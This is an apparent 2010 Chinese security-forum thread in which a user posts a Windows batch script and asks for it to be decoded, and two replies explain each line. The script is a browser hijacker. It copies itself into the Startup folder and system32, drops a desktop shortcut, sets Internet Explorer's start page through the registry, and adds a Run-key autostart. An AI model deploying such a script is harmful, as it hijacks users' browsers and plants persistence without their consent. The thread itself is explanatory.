Board logo

标题: 请教谁能解密 bat文件 [打印本页]

作者: j@k    时间: 2010-3-13 17:32     标题: 请教谁能解密 bat文件

@echo off
@copy %0 "%userprofile%\「开始」菜单\程序\启动"\system.bat
copy %0 %windir%\system32\net.bat /y
echo [InternetShortcut] >"%userprofile%\桌面\趣乐网QuleNet.com.url"
echo URL=http://www.qulenet.com/ >>"%userprofile%\桌面\趣乐网3ast.com.cn.url"
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t reg_sz /d http://www.3ast.com.cn /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Default_Page_URL" /t reg_sz /d http://www.3ast.com.cn/ /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Net /t REG_SZ /d %windir%\system32\net.bat /f
作者: 柔肠寸断    时间: 2010-3-14 14:49

echo URL=http://www.qulenet.com/ >>"%userprofile%\桌面\趣乐网3ast.com.cn.url"
在你桌面放一个url快捷方式

reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t reg_sz /d http://www.3ast.com.cn /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Default_Page_URL" /t reg_sz /d http://www.3ast.com.cn/ /f

修改注册表,增加它站为主页

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Net /t REG_SZ /d %windir%\system32\net.bat /f
修改注册表,设置该bat文件开机启动
作者: chowfaye    时间: 2010-3-14 22:11

@echo off        //关闭回显
@copy %0 "%userprofile%\「开始」菜单\程序\启动"\system.bat                     //%0 是指批处理本身,这里的@copy的@有点多余,意思是:拷贝当前批处理到"%userprofile%\「开始」菜单\程序\启动"这个路径,并命名为:system.bat,%userprofile%为环境变量
copy %0 %windir%\system32\net.bat /y                                                     //拷贝当前批处理到%windir%\system32\这个路径,并且命名为:net.bat,/y是copy的一个参数
echo [InternetShortcut] >"%userprofile%\桌面\趣乐网QuleNet.com.url"
echo URL=http://www.qulenet.com/ >>"%userprofile%\桌面\趣乐网3ast.com.cn.url"          // 与上一句都是将echo后面的内容谢润到 *.url 文件中
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t reg_sz /d http://www.3ast.com.cn /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Default_Page_URL" /t reg_sz /d http://www.3ast.com.cn/ /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Net /t REG_SZ /d %windir%\system32\net.bat /f               //以上三句是设置主页,设置默认页,设置开机启动项




欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/) Powered by Discuz! 7.2